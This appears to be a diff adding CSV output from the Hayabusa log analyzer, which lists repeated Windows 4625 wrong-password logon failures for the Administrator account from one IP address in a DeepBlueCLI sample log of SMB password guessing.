+2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FEirUFRscaOwTuAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwQgMM9H1oN4te9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JbGILYTcFwtYbDk1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5KzNsgWvyUhNEHd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGvwbOtP3A5eDKCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YZvtNNX511hIleST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJBRTeW6OQtNrt5u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hovgq99STVt2GzrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4kpT3gf0VCAVuVSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiB04AvkYp0PP3n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PPluKgaiT10oC35V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8nCOM9uUeqv9QBx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dSPrrNCh2FSWZKbI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLDnCjr4pSdKAMX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G0UnmfB7lcXKEAvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ogjMSxcUw7cF5dMa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75uB8ejsSV5CbagM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5MMHLnyrzBQxluHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5QXLn6fpmR52RBAz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcdlrSUzcFNpaK5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJjiRO5rJzZ8XtqP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncBraDdG2htkHjXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lo9DNrL44Z2S2SYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QKcFiKC5QiIoHtxy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sqvq9GwuPCO15lUV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XzgtJ3qUmkFiIY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1wc1Hjb4AK0Np1q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PKYNy0JyxIlFusMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IrcKp13ut9M0pCi0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B3lJSH0r8iHAVhPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ju3lCbvbwvkIKsBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQOHcZeAKQG6wHhC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QBPkgoKDLABqdSQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqj4xOCsJg1j3IIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XhBIu6wUPHc3DZAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W0fI1GhH5YTOHbNN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7mLOWiojillZNYH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37dknpwsl8j1WRWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gzVum7a21sQe3fMt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JCFPSQmywelTXg74 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
